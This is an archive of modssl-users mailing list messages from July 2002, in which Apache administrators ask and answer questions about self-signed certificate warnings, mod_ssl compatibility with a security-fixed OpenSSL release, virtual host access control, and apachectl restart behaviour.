X-OriginalArrivalTime: 30 Jul 2002 18:55:43.0385 (UTC) FILETIME=[B4C36090:01C237FA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Boyer" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_008A_01C237D9.6C66C2E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I installed openSSL with mod_ssl, and I can access my site using =
https://blah.com  and I get a popup box telling me about a security =
issue and if I want to accept this. When I have visited other sites that =
are secure, it dosent ask me to accept anything. In my certificate it =
says its not part of the CA trusted root stores. Any help would be =
appreciated.

------=_NextPart_000_008A_01C237D9.6C66C2E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I installed openSSL with mod_ssl, and I =
can access=20
my site using https://blah.com  =
and I get a=20
popup box telling me about a security issue and if I want to accept =
this. When I=20
have visited other sites that are secure, it dosent ask me to accept =
anything.=20
In my certificate it says its not part of the CA trusted root stores. =
Any help=20
would be appreciated.


------=_NextPart_000_008A_01C237D9.6C66C2E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 08:37:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA27977; Wed, 31 Jul 2002 08:36:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id IAA27914; Wed, 31 Jul 2002 08:35:26 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2385C.4CE36340"
Subject: RE: ssl question
Date: Wed, 31 Jul 2002 16:34:19 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B5911949F@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: ssl question
Thread-Index: AcI4W84NEI+hwjgMQnylJzveEw/z8gAABLDg
From: "Vince Montuoro" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2385C.4CE36340
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Mike,
=20
The reasoning behind that message is that you haven't purchased a =
certificate from a valid certificate store.  The bought my companies at =
verisign.com.
=20
If you are not releasing this web app to the public you could simply =
install the certificate and you shouldn't get the message again.
=20
Good luck,
=20

	Vincent Montuoro
Solution Engineer
Request
Level 12 461 Bourke Street
Melbourne Vic 3000
Email:     vmontuoro@request.com.au
Office:    +61 3 8628 2764
Mobile:   0408 005 979=20

=20

-----Original Message-----
From: Mike Boyer [mailto:bossdeez@hotmail.com]
Sent: Wednesday, 31 July 2002 4:57 AM
To: modssl-users@modssl.org
Subject: ssl question


I installed openSSL with mod_ssl, and I can access my site using =
https://blah.com  and I get a popup box telling me about a security =
issue and if I want to accept this. When I have visited other sites that =
are secure, it dosent ask me to accept anything. In my certificate it =
says its not part of the CA trusted root stores. Any help would be =
appreciated.


------_=_NextPart_001_01C2385C.4CE36340
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











Mike,


 


The=20
reasoning behind that message is that you haven't purchased a =
certificate from a=20
valid certificate store.  The bought my companies at=20
verisign.com.


 


If=20
you are not releasing this web app to the public you could =
simply=20
install the certificate and you shouldn't get the message=20
again.


 


Good=20
luck,


 




    
  
      
    
      Vincent=20
    Montuoro
      Solution=20
    Engineer
      Request
      Level 12 461 Bourke Street
      Melbourne Vic 3000
      Email:           vmontuoro@request.com.au
      Office:          +61 3 8628 2764
      Mobile:   0408 005 979=20

 



  
-----Original Message-----
From: Mike Boyer=20
  [mailto:bossdeez@hotmail.com]
Sent: Wednesday, 31 July 2002 =
4:57=20
  AM
To: modssl-users@modssl.org
Subject: ssl=20
  question


  
I installed openSSL with mod_ssl, and =
I can=20
  access my site using https://blah.com  and=20
  I get a popup box telling me about a security issue and if I want to =
accept=20
  this. When I have visited other sites that are secure, it dosent ask =
me to=20
  accept anything. In my certificate it says its not part of the CA =
trusted root=20
  stores. Any help would be =
appreciated.


------_=_NextPart_001_01C2385C.4CE36340--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 11:39:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10597; Wed, 31 Jul 2002 11:38:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailserver.kippdata.de id LAA10562; Wed, 31 Jul 2002 11:37:25 +0200 (MET DST)
Received: from pfarr ([195.227.30.175] (may be forged))
	by mailserver.kippdata.de (8.8.6/8.8.6) with ESMTP id LAA24649;
	Wed, 31 Jul 2002 11:38:35 +0200 (MEST)
Message-Id: <4.2.2.20020731113805.01e7e710@mailserver.kippdata.de>
X-Sender: jung@mailserver.kippdata.de
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 
Date: Wed, 31 Jul 2002 11:40:42 +0200
To: modssl-users@modssl.org
From: Rainer Jung 
Subject: openssl0.9.6e ok with mod_ssl 2.8.10?
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA10594
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

will there be a new version of mod_ssl for the security fixed openssl 
0.9.6e and openssl-engine 0.9.6e or is it safe to use mod_ssl 2.8.10.

If there will be a new version: is there an expected release date/time?

Thanks for any answers!

Rainer Jung

kippdata informationstechnologie GmbH
Bornheimer Straße 33a
D-53111 Bonn
Germany

Tel.: +49/228/98549-0
Fax:  +49/228/98549-50
email: rainer.jung@kippdata.de

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 12:10:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA12212; Wed, 31 Jul 2002 12:09:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id MAA12157; Wed, 31 Jul 2002 12:08:33 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 82F002F62
	for ; Wed, 31 Jul 2002 12:08:32 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id B4E5B2B75; Wed, 31 Jul 2002 12:08:29 +0200 (METDST)
Date: Wed, 31 Jul 2002 12:08:29 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: openssl0.9.6e ok with mod_ssl 2.8.10?
Message-ID: <20020731100829.GB12213@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <4.2.2.20020731113805.01e7e710@mailserver.kippdata.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <4.2.2.20020731113805.01e7e710@mailserver.kippdata.de>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jul 31, 2002 at 11:40:42AM +0200, Rainer Jung wrote:
> Hi,
> 
> will there be a new version of mod_ssl for the security fixed openssl 
> 0.9.6e and openssl-engine 0.9.6e or is it safe to use mod_ssl 2.8.10.

It should be safe to use mod_ssl 2.8.10. The API of openssl did not change
when upgrading from 0.9.6d to 0.9.6e, so no update for mod_ssl is
required.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 13:40:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA18222; Wed, 31 Jul 2002 13:39:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA18201; Wed, 31 Jul 2002 13:38:55 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E72044CE742; Wed, 31 Jul 2002 13:38:54 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4C72A286FB; Wed, 31 Jul 2002 13:37:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from stardust.solidas.com id NAA15348; Wed, 31 Jul 2002 13:02:41 +0200 (MET DST)
Received: from solidas.com (h62-92-118-71.q-free.com [62.92.118.71])
	(authenticated)
	by stardust.solidas.com (8.11.6/8.11.6) with ESMTP id g6VBS2G22369
	for ; Wed, 31 Jul 2002 13:28:03 +0200
Message-ID: <3D47C3C4.9040207@solidas.com>
Date: Wed, 31 Jul 2002 13:02:28 +0200
From: "Svein E. Seldal" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: http and https from same config
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Svein E. Seldal" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi guys,

I want to run a http server on port 81 which should only be available to 
the localnet, say 192.168.0.x/24 *and* on https with client certificates 
from the whole world. No passwords should be used in neither methodes.

Now I've got SSL working with the certs, so that's not my question, but 
how do I configure the virtual host to enforce these access rights? 
Today I've "hacked" the problem by running two separate (yet identical) 
virtual hosts. I want to run http(81) and https from the same virtual 
host config. Is this possible?


Regards,
Svein
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 14:13:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA20457; Wed, 31 Jul 2002 14:12:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id OAA20423; Wed, 31 Jul 2002 14:11:37 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id IAA16143;
	Wed, 31 Jul 2002 08:14:14 -0400
Date: Wed, 31 Jul 2002 08:14:13 -0400 (EDT)
From: "R. DuFresne" 
To: Rainer Jung 
cc: modssl-users@modssl.org
Subject: Re: openssl0.9.6e ok with mod_ssl 2.8.10?
In-Reply-To: <4.2.2.20020731113805.01e7e710@mailserver.kippdata.de>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



If I read the advisories correctly, the problem was related to opsnssl
code.  so, recompiling apache/mod-ssl with the new or patched openssl
sources should fix that issue.  the other question though is, since there
were additional advisories related to mm, and apache 1.3.X/mod-ssl
requires mm for proper compilation and functioning, if there is a new mm
package or patch available.

Thanks,

Ron dufresne

On Wed, 31 Jul 2002, Rainer Jung wrote:

> Hi,
> 
> will there be a new version of mod_ssl for the security fixed openssl 
> 0.9.6e and openssl-engine 0.9.6e or is it safe to use mod_ssl 2.8.10.
> 
> If there will be a new version: is there an expected release date/time?
> 
> Thanks for any answers!
> 
> Rainer Jung
> 
> kippdata informationstechnologie GmbH
> Bornheimer Straße 33a
> D-53111 Bonn
> Germany
> 
> Tel.: +49/228/98549-0
> Fax:  +49/228/98549-50
> email: rainer.jung@kippdata.de
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 14:19:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA20827; Wed, 31 Jul 2002 14:18:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id OAA20822; Wed, 31 Jul 2002 14:17:58 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 761DC64132
	for ; Wed, 31 Jul 2002 08:17:51 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g6VCHoBg026586
	for ; Wed, 31 Jul 2002 08:17:51 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id IAA06067; Wed, 31 Jul 2002 08:18:47 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: apachectl restart problem...
From: Sean M Alderman 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 31 Jul 2002 08:18:47 -0400
Message-Id: <1028117927.17722.497.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Greetings all,
  I'm curious if anyone has come across issues with starting apache
using -
# $APACHE_HOME/bin/apachectl startssl
and then having apache hang when issuing this -
# $APACHE_HOME/bin/apachectl restart

I'm running 1.3.26 with the latest mod_ssl on Solaris 8.  I don't get
any error messages in the logs, and apachectl says that it restarts just
fine, but when you point a browser back to the server it does not
respond.  I can fix it with an apachectl stop;apachectl startssl, but
I'm just curious about not being able to do the restart.
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 14:26:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21212; Wed, 31 Jul 2002 14:25:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id OAA21167; Wed, 31 Jul 2002 14:24:35 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id OAA28527
	for ; Wed, 31 Jul 2002 14:24:30 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.4617);
	 Wed, 31 Jul 2002 14:20:45 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: openssl0.9.6e ok with mod_ssl 2.8.10?
Date: Wed, 31 Jul 2002 14:16:54 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB80120BE93@qeo00200>
Thread-Topic: openssl0.9.6e ok with mod_ssl 2.8.10?
Thread-Index: AcI4i50qBMzPi545QySRxzF8dPtRowAAJ7mg
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 31 Jul 2002 12:20:45.0187 (UTC) FILETIME=[B1F31530:01C2388C]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA21196
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

yes, there is a new version of mm available on http://www.ossp.org/pkg/lib/mm/ 
( Status: Stable Version:   1.2.1  (28-Jul-2002) )

The advisory is here: http://www.openpkg.org/security/OpenPKG-SA-2002.007-mm.html



Kind regards,

Bert Courtin




-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com]
Sent: Wednesday, July 31, 2002 2:14 PM
To: Rainer Jung
Cc: modssl-users@modssl.org
Subject: Re: openssl0.9.6e ok with mod_ssl 2.8.10?




If I read the advisories correctly, the problem was related to opsnssl
code.  so, recompiling apache/mod-ssl with the new or patched openssl
sources should fix that issue.  the other question though is, since there
were additional advisories related to mm, and apache 1.3.X/mod-ssl
requires mm for proper compilation and functioning, if there is a new mm
package or patch available.

Thanks,

Ron dufresne

On Wed, 31 Jul 2002, Rainer Jung wrote:

> Hi,
> 
> will there be a new version of mod_ssl for the security fixed openssl 
> 0.9.6e and openssl-engine 0.9.6e or is it safe to use mod_ssl 2.8.10.
> 
> If there will be a new version: is there an expected release date/time?
> 
> Thanks for any answers!
> 
> Rainer Jung
> 
> kippdata informationstechnologie GmbH
> Bornheimer Straße 33a
> D-53111 Bonn
> Germany
> 
> Tel.: +49/228/98549-0
> Fax:  +49/228/98549-50
> email: rainer.jung@kippdata.de
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:14:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA24378; Wed, 31 Jul 2002 15:13:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id PAA24258; Wed, 31 Jul 2002 15:12:25 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id CAA24298
	for ; Wed, 31 Jul 2002 02:36:01 -0500
Message-Id: <5.1.0.14.2.20020731081108.0282e7a8@mail.nelsonprinting.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 08:14:11 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: RE: ssl question
In-Reply-To: <25B12856E53F0047BE90FB2CFC0D1B5911949F@rdsl_mlb_mx1.reques
 tdsl.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

But I did a self-signed cert for testing purposes.  Shouldn't that work?

--
Matt


At 04:34 PM 7/31/2002 +1000, you wrote:
>Mike,
>
>The reasoning behind that message is that you haven't purchased a 
>certificate from a valid certificate store.  The bought my companies at 
>verisign.com.
>
>If you are not releasing this web app to the public you could simply 
>install the certificate and you shouldn't get the message again.
>
>Good luck,
>
>Vincent Montuoro Solution Engineer Request Level 12 461 Bourke Street 
>Melbourne Vic 3000 Email:     vmontuoro@request.com.au Office:    +61 3 
>8628 2764 Mobile:   0408 005 979
>
>
>-----Original Message-----
>From: Mike Boyer [mailto:bossdeez@hotmail.com]
>Sent: Wednesday, 31 July 2002 4:57 AM
>To: modssl-users@modssl.org
>Subject: ssl question
>
>I installed openSSL with mod_ssl, and I can access my site using 
>https://blah.com  and I get a popup box telling me about 
>a security issue and if I want to accept this. When I have visited other 
>sites that are secure, it dosent ask me to accept anything. In my 
>certificate it says its not part of the CA trusted root stores. Any help 
>would be appreciated.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:34:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA25555; Wed, 31 Jul 2002 15:33:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id PAA25456; Wed, 31 Jul 2002 15:32:22 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g6VDWFD26685
	for ; Wed, 31 Jul 2002 09:32:15 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 31 Jul 2002 09:23:48 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: ssl question
Date: Wed, 31 Jul 2002 09:23:47 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


No, because your browser does not have the signing authority in its list of
trusted / root CAs. There are three options, but really only two are
practical. The first would be to just import the certificate the first time
you see this pop up and you can do that by clicking on "View certificate"
when you get the pop up (I'm talking IE here). The second option would be to
purchase and use a cert from a CA which is in your browsers list of
trusted/root CA (someone like verisign). You can get the list by clicking on
Tools->Internet options->The content tab->Certificates button->Trusted Root
Certification Authorites tab. The third option would be to become a CA on
that list by paying MS big bucks and setting your own company to do it (not
what I would call viable :-).

-Noah

> -----Original Message-----
> From: Matt Nelson [mailto:matt@nelsonprinting.com]
> Sent: Wednesday, July 31, 2002 9:14 AM
> To: modssl-users@modssl.org
> Subject: RE: ssl question
> 
> But I did a self-signed cert for testing purposes.  Shouldn't that work?
> 
> --
> Matt
> 
> 
> At 04:34 PM 7/31/2002 +1000, you wrote:
> >Mike,
> >
> >The reasoning behind that message is that you haven't purchased a
> >certificate from a valid certificate store.  The bought my companies at
> >verisign.com.
> >
> >If you are not releasing this web app to the public you could simply
> >install the certificate and you shouldn't get the message again.
> >
> >Good luck,
> >
> >Vincent Montuoro Solution Engineer Request Level 12 461 Bourke Street
> >Melbourne Vic 3000 Email:     vmontuoro@request.com.au Office:    +61 3
> >8628 2764 Mobile:   0408 005 979
> >
> >
> >-----Original Message-----
> >From: Mike Boyer [mailto:bossdeez@hotmail.com]
> >Sent: Wednesday, 31 July 2002 4:57 AM
> >To: modssl-users@modssl.org
> >Subject: ssl question
> >
> >I installed openSSL with mod_ssl, and I can access my site using
> >https://blah.com  and I get a popup box telling me
> about
> >a security issue and if I want to accept this. When I have visited other
> >sites that are secure, it dosent ask me to accept anything. In my
> >certificate it says its not part of the CA trusted root stores. Any help
> >would be appreciated.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:50:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA26568; Wed, 31 Jul 2002 15:49:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA26459; Wed, 31 Jul 2002 15:48:13 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA16470
	for ; Wed, 31 Jul 2002 15:48:02 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA29961
	for ; Wed, 31 Jul 2002 15:48:02 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: apachectl restart problem...
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Wed, 31 Jul 2002 15:48:01 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA924B@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: apachectl restart problem...
Thread-Index: AcI4jJS4uYi0q6sHRsKZsgeicRVhEAAC+e7A
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA26532
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
>
>Greetings all,
>  I'm curious if anyone has come across issues with starting apache
>using -
># $APACHE_HOME/bin/apachectl startssl
>and then having apache hang when issuing this -
># $APACHE_HOME/bin/apachectl restart
>
>I'm running 1.3.26 with the latest mod_ssl on Solaris 8.  I don't get
>any error messages in the logs, and apachectl says that it 
>restarts just
>fine, but when you point a browser back to the server it does not
>respond.  I can fix it with an apachectl stop;apachectl startssl, but
>I'm just curious about not being able to do the restart.

Restart sends a HUP to apache. I've found that this is sometimes insufficiently forceful to make apache reload certain SSL parameters (e.g. if you change the certificate). However, it should be sufficient for non-SSL edits.

Rgds,
Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:54:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27015; Wed, 31 Jul 2002 15:53:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA26988; Wed, 31 Jul 2002 15:53:11 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA16820
	for ; Wed, 31 Jul 2002 15:53:10 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA14684
	for ; Wed, 31 Jul 2002 15:53:09 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
